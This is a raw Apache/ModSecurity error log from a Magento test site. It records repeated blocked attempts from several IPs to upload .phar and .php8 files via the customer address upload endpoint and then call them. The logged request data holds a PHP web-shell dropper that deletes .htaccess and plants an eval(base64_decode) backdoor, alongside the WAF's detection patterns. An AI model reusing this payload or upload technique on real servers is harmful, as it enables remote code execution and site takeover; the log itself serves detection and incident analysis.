[Fri Feb 27 09:20:53.291876 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/0/o088364f428d25.phar"] [unique_id "aaFT5fM8q4o1RxBFsBzDOwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 27 09:20:53.294222 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/0/o088364f428d25.phar"] [unique_id "aaFT5fM8q4o1RxBFsBzDOwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 27 09:20:53.294418 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/0/o088364f428d25.phar"] [unique_id "aaFT5fM8q4o1RxBFsBzDOwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 27 09:20:54.433683 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: o088364f428d25.php8 found within FILES:custom_attributes[country_id]: o088364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaFT5vM8q4o1RxBFsBzDPAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/0/o088364f428d25.phar
[Fri Feb 27 09:20:54.434463 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaFT5vM8q4o1RxBFsBzDPAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/0/o088364f428d25.phar
[Fri Feb 27 09:20:54.434664 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaFT5vM8q4o1RxBFsBzDPAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/0/o088364f428d25.phar
[Fri Feb 27 09:20:55.209309 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Rule 7fecf49dbbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/0/o088364f428d25.php8"] [unique_id "aaFT5_M8q4o1RxBFsBzDPQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 27 09:20:55.209793 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/0/o088364f428d25.php8"] [unique_id "aaFT5_M8q4o1RxBFsBzDPQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 27 09:20:55.212205 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/0/o088364f428d25.php8"] [unique_id "aaFT5_M8q4o1RxBFsBzDPQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 27 09:20:55.212397 2026] [:error] [pid 2356582] [client 89.239.157.171:41686] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/0/o088364f428d25.php8"] [unique_id "aaFT5_M8q4o1RxBFsBzDPQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 27 20:20:20.850240 2026] [authz_core:error] [pid 2356583] [client 172.213.24.77:24004] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app
[Sat Feb 28 04:19:50.161257 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Rule 7f347e182be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.phar"] [unique_id "aaJe1vbyfL5lt6LQuv2bewAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 04:19:50.161873 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.phar"] [unique_id "aaJe1vbyfL5lt6LQuv2bewAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 04:19:50.166002 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.phar"] [unique_id "aaJe1vbyfL5lt6LQuv2bewAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 04:19:50.166196 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.phar"] [unique_id "aaJe1vbyfL5lt6LQuv2bewAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 04:19:50.322182 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: yf88364f428d25.php8 found within FILES:custom_attributes[country_id]: yf88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaJe1vbyfL5lt6LQuv2bfAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/f/yf88364f428d25.phar
[Sat Feb 28 04:19:50.322845 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaJe1vbyfL5lt6LQuv2bfAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/f/yf88364f428d25.phar
[Sat Feb 28 04:19:50.323030 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaJe1vbyfL5lt6LQuv2bfAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/f/yf88364f428d25.phar
[Sat Feb 28 04:19:50.626936 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Rule 7f347e182be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.php8"] [unique_id "aaJe1vbyfL5lt6LQuv2bfQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 04:19:50.627411 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.php8"] [unique_id "aaJe1vbyfL5lt6LQuv2bfQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 04:19:50.629819 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.php8"] [unique_id "aaJe1vbyfL5lt6LQuv2bfQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 04:19:50.630019 2026] [:error] [pid 2378304] [client 46.149.66.101:46300] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.php8"] [unique_id "aaJe1vbyfL5lt6LQuv2bfQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 23:12:14.605620 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Rule 7f347e182be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/y/7y88364f428d25.phar"] [unique_id "aaNoPsiqy3jYVmgj06zilQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 23:12:14.606264 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/y/7y88364f428d25.phar"] [unique_id "aaNoPsiqy3jYVmgj06zilQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 23:12:14.609165 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/y/7y88364f428d25.phar"] [unique_id "aaNoPsiqy3jYVmgj06zilQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 23:12:14.609402 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/y/7y88364f428d25.phar"] [unique_id "aaNoPsiqy3jYVmgj06zilQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 23:12:15.186966 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 7y88364f428d25.php8 found within FILES:custom_attributes[country_id]: 7y88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaNoP8iqy3jYVmgj06zilgAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/7/y/7y88364f428d25.phar
[Sat Feb 28 23:12:15.187660 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaNoP8iqy3jYVmgj06zilgAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/7/y/7y88364f428d25.phar
[Sat Feb 28 23:12:15.187940 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aaNoP8iqy3jYVmgj06zilgAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/7/y/7y88364f428d25.phar
[Sat Feb 28 23:12:15.606432 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Rule 7f347e182be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/y/7y88364f428d25.php8"] [unique_id "aaNoP8iqy3jYVmgj06zilwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 23:12:15.606938 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/y/7y88364f428d25.php8"] [unique_id "aaNoP8iqy3jYVmgj06zilwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 28 23:12:15.609566 2026] [:error] [pid 2383930] [client 213.109.225.211:10711] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/y/7y88364f428d25.php8"] [unique_id "aaNoP8iqy3jYVmgj06zilwAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
